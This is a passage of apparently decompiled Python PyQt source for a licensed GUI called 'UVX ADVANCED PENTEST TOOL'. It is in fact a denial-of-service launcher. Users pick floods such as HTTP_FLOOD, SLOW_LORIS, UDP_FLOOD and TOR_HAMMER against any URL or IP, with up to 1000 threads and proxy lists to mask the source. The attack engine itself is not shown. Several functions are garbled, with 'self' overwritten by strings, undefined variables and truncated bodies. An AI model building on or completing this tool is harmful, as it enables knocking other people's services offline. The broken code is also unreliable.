        content_layout.addStretch()
        content_widget.setLayout(content_layout)
        layout.addWidget(header_widget)
        layout.addWidget(content_widget, alignment=Qt.AlignCenter)
        page.setLayout(layout)
        return page

    def create_pentest_page(self):
        page = QWidget()
        layout = QVBoxLayout()
        layout.setContentsMargins(20, 20, 20, 20)
        layout.setSpacing(15)
        header_widget = QWidget()
        header_layout = QHBoxLayout(header_widget)
        self.license_timer_label = QLabel('Loading license status...')
        self.license_timer_label.setStyleSheet('\n            font-size: 16px;\n            font-weight: bold;\n            color: #63b3ed;\n            padding: 10px;\n            background-color: rgba(45, 55, 72, 200);\n            border-radius: 8px;\n        ')
        title_label = QLabel('⚡ UVX ADVANCED PENTEST TOOL')
        title_label.setStyleSheet('\n            font-size: 20px;\n            font-weight: bold;\n            color: #68d391;\n        ')
        close_btn = QPushButton('✕')
        close_btn.setFixedSize(30, 30)
        close_btn.setStyleSheet('\n            QPushButton {\n                background-color: #e53e3e;\n                color: white;\n                border: none;\n                border-radius: 15px;\n                font-weight: bold;\n            }\n            QPushButton:hover {\n                background-color: #c53030;\n            }\n        ')
        close_btn.clicked.connect(self.close)
        header_layout.addWidget(self.license_timer_label)
        header_layout.addStretch()
        header_layout.addWidget(title_label)
        header_layout.addStretch()
        header_layout.addWidget(close_btn)
        splitter = QSplitter(Qt.Vertical)
        control_panel = QWidget()
        control_layout = QVBoxLayout(control_panel)
        target_group = QGroupBox('🎯 Target Configuration')
        target_layout = QVBoxLayout()
        address_layout = QHBoxLayout()
        address_layout.addWidget(QLabel('Target URL/IP:'))
        self.target_input = QLineEdit()
        self.target_input.setPlaceholderText('example.com or 192.168.1.1')
        address_layout.addWidget(self.target_input)
        address_layout.addWidget(QLabel('Port:'))
        self.port_input = QLineEdit()
        self.port_input.setPlaceholderText('80')
        self.port_input.setText('80')
        self.port_input.setFixedWidth(80)
        address_layout.addWidget(self.port_input)
        method_layout = QHBoxLayout()
        method_layout.addWidget(QLabel('Target Type:'))
        self.target_type = QComboBox()
        self.target_type.addItems(['Web Application', 'VPS/Server'])
        method_layout.addWidget(self.target_type)
        method_layout.addWidget(QLabel('Attack Method:'))
        self.attack_method = QComboBox()
        self.attack_method.addItems(['HTTP_FLOOD', 'SLOW_LORIS', 'UDP_FLOOD', 'TCP_FLOOD', 'ICMP_FLOOD', 'RUDY', 'XERXES', 'GOLDEN_EYE', 'TOR_HAMMER'])
        method_layout.addWidget(self.attack_method)
        config_layout = QHBoxLayout()
        config_layout.addWidget(QLabel('Duration (seconds):'))
        self.duration_input = QLineEdit()
        self.duration_input.setPlaceholderText('60')
        self.duration_input.setText('60')
        self.duration_input.setFixedWidth(80)
        config_layout.addWidget(self.duration_input)
        config_layout.addWidget(QLabel('Threads:'))
        self.threads_input = QComboBox()
        self.threads_input.addItems(['50', '100', '200', '500', '1000'])
        self.threads_input.setCurrentText('100')
        config_layout.addWidget(self.threads_input)
        config_layout.addStretch()
        target_layout.addLayout(address_layout)
        target_layout.addLayout(method_layout)
        target_layout.addLayout(config_layout)
        target_group.setLayout(target_layout)
        proxy_group = QGroupBox('🔌 Proxy Management')
        proxy_layout = QVBoxLayout()
        proxy_file_layout = QHBoxLayout()
        proxy_file_layout.addWidget(QLabel('Proxy List File:'))
        self.proxy_file_input = QLineEdit()
        self.proxy_file_input.setPlaceholderText('Select proxy list file...')
        proxy_file_layout.addWidget(self.proxy_file_input)
        self.browse_proxy_btn = QPushButton('📁 Browse')
        self.browse_proxy_btn.clicked.connect(self.browse_proxy_file)
        self.browse_proxy_btn.setFixedWidth(100)
        proxy_file_layout.addWidget(self.browse_proxy_btn)
        proxy_buttons_layout = QHBoxLayout()
        self.load_proxy_btn = QPushButton('📥 Load Proxies')
        self.load_proxy_btn.clicked.connect(self.load_proxies)
        self.load_proxy_btn.setFixedWidth(120)
        self.validate_proxy_btn = QPushButton('✅ Validate Proxies')
        self.validate_proxy_btn.clicked.connect(self.validate_proxies)
        self.validate_proxy_btn.setFixedWidth(120)
        self.use_proxy_checkbox = QCheckBox('Use Proxies for Attack')
        self.use_proxy_checkbox.setChecked(False)
        self.use_proxy_checkbox.stateChanged.connect(self.toggle_proxy_usage)
        proxy_buttons_layout.addWidget(self.load_proxy_btn)
        proxy_buttons_layout.addWidget(self.validate_proxy_btn)
        proxy_buttons_layout.addWidget(self.use_proxy_checkbox)
        proxy_buttons_layout.addStretch()
        proxy_status_layout = QHBoxLayout()
        self.proxy_status_label = QLabel('No proxies loaded')
        self.proxy_status_label.setStyleSheet('color: #a0aec0; font-size: 12px;')
        proxy_status_layout.addWidget(self.proxy_status_label)
        proxy_status_layout.addStretch()
        proxy_layout.addLayout(proxy_file_layout)
        proxy_layout.addLayout(proxy_buttons_layout)
        proxy_layout.addLayout(proxy_status_layout)
        proxy_group.setLayout(proxy_layout)
        button_layout = QHBoxLayout()
        self.start_btn = QPushButton('🚀 START ATTACK')
        self.start_btn.clicked.connect(self.start_attack)
        self.start_btn.setStyleSheet('\n            QPushButton {\n                background: qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0,\n                    stop: 0 #68d391, stop: 1 #48bb78);\n                color: #0a192f;\n                font-weight: bold;\n                font-size: 16px;\n                padding: 15px;\n            }\n            QPushButton:hover {\n                background: qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0,\n                    stop: 0 #48bb78, stop: 1 #38a169);\n            }\n        ')
        self.stop_btn = QPushButton('⏹️ STOP ATTACK')
        self.stop_btn.clicked.connect(self.stop_attack)
        self.stop_btn.setEnabled(False)
        self.stop_btn.setStyleSheet('\n            QPushButton {\n                background-color: #e53e3e;\n                color: white;\n                font-weight: bold;\n                font-size: 16px;\n                padding: 15px;\n            }\n            QPushButton:hover {\n                background-color: #c53030;\n            }\n        ')
        self.export_btn = QPushButton('💾 EXPORT LOGS')
        self.export_btn.clicked.connect(self.export_logs)
        self.export_btn.setStyleSheet('\n            QPushButton {\n                background: qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0,\n                    stop: 0 #d69e2e, stop: 1 #b7791f);\n                color: white;\n                font-weight: bold;\n                font-size: 16px;\n                padding: 15px;\n            }\n        ')
        button_layout.addWidget(self.start_btn)
        button_layout.addWidget(self.stop_btn)
        button_layout.addWidget(self.export_btn)
        control_layout.addWidget(target_group)
        control_layout.addWidget(proxy_group)
        control_layout.addLayout(button_layout)
        console_group = QGroupBox('📊 Attack Console - Real-time Monitoring')
        console_layout = QVBoxLayout()
        self.console_output = QTextEdit()
        self.console_output.setReadOnly(True)
        console_layout.addWidget(self.console_output)
        console_group.setLayout(console_layout)
        splitter.addWidget(control_panel)
        splitter.addWidget(console_group)
        splitter.setSizes([400, 400])
        layout.addWidget(header_widget)
        layout.addWidget(splitter)
        page.setLayout(layout)
        return page

    def browse_proxy_file(self):
        """مرورگر فایل برای انتخاب فایل پروکسی"""  # inserted
        file_path, _ = QFileDialog.getOpenFileName(self, 'Select Proxy List File', '', 'Text Files (*.txt);;All Files (*)')
        if file_path:
            self.proxy_file_input.setText(file_path)
        return None

    def load_proxies(self):
        """بارگذاری پروکسی‌ها از فایل"""  # inserted
        file_path = self.proxy_file_input.text().strip()
        if not file_path:
            QMessageBox.warning(self, 'Error', 'Please select a proxy list file!')
        return None

    def validate_proxies(self):
        """اعتبارسنجی پروکسی‌ها"""  # inserted
        if not self.pentest_engine.proxy_manager.proxies:
            QMessageBox.warning(self, 'Error', 'No proxies loaded to validate!')
        return None

    def _validate_proxies_thread(self):
        """اعتبارسنجی پروکسی‌ها در ترد جداگانه"""  # inserted
        self = self.pentest_engine.validate_proxies(self.console_log)
        QTimer.singleShot(0, lambda: self._update_proxy_validation_result(valid_count))

    def _update_proxy_validation_result(self, valid_count):
        """به روزرسانی نتیجه اعتبارسنجی"""  # inserted
        total_count = len(self.pentest_engine.proxy_manager.proxies)
        self.proxy_status_label.setText(f'Valid: {valid_count}/{total_count} proxies')
        if valid_count > 0:
            self.proxy_status_label.setStyleSheet('color: #68d391;')
        self.validate_proxy_btn.setEnabled(True)
        self.validate_proxy_btn.setText('✅ Validate Proxies')
        self.console_log(f'[PROXY] Validation completed: {valid_count} valid proxies out of {total_count}')

    def toggle_proxy_usage(self, state):
        """تغییر وضعیت استفاده از پروکسی"""  # inserted
        use_proxy = state == Qt.Checked
        self.pentest_engine.set_proxy_usage(use_proxy)
        if use_proxy:
            self.console_log('[PROXY] Proxy usage enabled')
        return None

    def check_initial_license(self):
        valid, remaining, license_type, status_msg = self.license_manager.check_license_status()
        if valid:
            self.central_widget.setCurrentIndex(1)
            self.update_license_timer()
        return None

    def activate_license(self):
        self = self.license_input.text().strip()
        if not self:
            QMessageBox.warning(self, 'Error', 'Please enter a license key!')
        return None

    def process_license_activation(self, license_key):
        success, license_type, expiry_date = self.license_manager.activate_license(license_key)
        if success:
            self.loading_label.setText(f'✅ {license_type} Activated!')
            self.loading_label.setStyleSheet('color: #68d391;')
            QTimer.singleShot(1500, lambda: self.central_widget.setCurrentIndex(1))
        return None

    def update_license_timer(self):
        valid, remaining, license_type, status_msg = self.license_manager.check_license_status()
        if valid:
            days = remaining.days
            hours, remainder = divmod(remaining.seconds, 3600)
            minutes, seconds = divmod(remainder, 60)
            timer_text = f'⏰ {license_type} | Remaining: {days}d {hours}h {minutes}m {seconds}s'
            self.license_timer_label.setText(timer_text)
        return None

    def console_log(self, message):
        """افزودن پیام به کنسول"""  # inserted
        timestamp = datetime.now().strftime('%H:%M:%S')
        self = f'[{timestamp}] {message}'
        QTimer.singleShot(0, lambda: self._add_to_console(formatted_message))

    def _add_to_console(self, message):
        self.console_output.append(message)
        cursor = self.console_output.textCursor()
        cursor.movePosition(cursor.End)
        self.console_output.setTextCursor(cursor)

    def start_attack(self):
        if self.is_attacking:
            pass  # postinserted
        return None

    def execute_attack(self, method, target, port, duration, threads):
        """اجرای حمله در ترد جداگانه"""  # inserted
        try:
            success = self.pentest_engine.start_attack(method, target, port, duration, threads, self.console_log)
            if success:
                time.sleep(duration)
                if self.pentest_engine.active_attacks > 0:
                    self.console_log('✅ Attack completed successfully!')
            self.is_attacking = False
            self.pentest_engine.stop_attacks()
            QTimer.singleShot(0, self._reset_attack_ui)
        except Exception as e:
            self.console_log(f'💥 Attack error: {str(e)}')

    def _reset_attack_ui(self):
        """بازنشانی UI پس از اتمام حمله"""  # inserted
        self.start_btn.setEnabled(True)
        self.stop_btn.setEnabled(False)

    def stop_attack(self):
        """توقف حمله"""  # inserted
        self.is_attacking = False
        self.pentest_engine.stop_attacks()
        self.console_log('⏹️ Stopping all attacks...')
        self.stop_btn.setEnabled(False)

    def export_logs(self):
        """صدور لاگ‌ها به فایل"""  # inserted
        if not self.console_output.toPlainText():
            QMessageBox.warning(self, 'Error', 'No logs to export!')
        return None

    def mousePressEvent(self, event):
        if event.button() == Qt.LeftButton:
            self.drag_start_position = event.globalPos() - self.frameGeometry().topLeft()
            event.accept()
        return None

    def mouseMoveEvent(self, event):
        if event.buttons() == Qt.LeftButton and hasattr(self, 'drag_start_position'):
            self.move(event.globalPos() - self.drag_start_position)
            event.accept()
            return None
if __name__ == '__main__':
    security_check()
    app = QApplication(sys.argv)
    font = QFont('Segoe UI', 10)
    font.setWeight(QFont.Normal)
    app.setFont(font)
    window = PentestApp()
    sys.exit(app.exec_())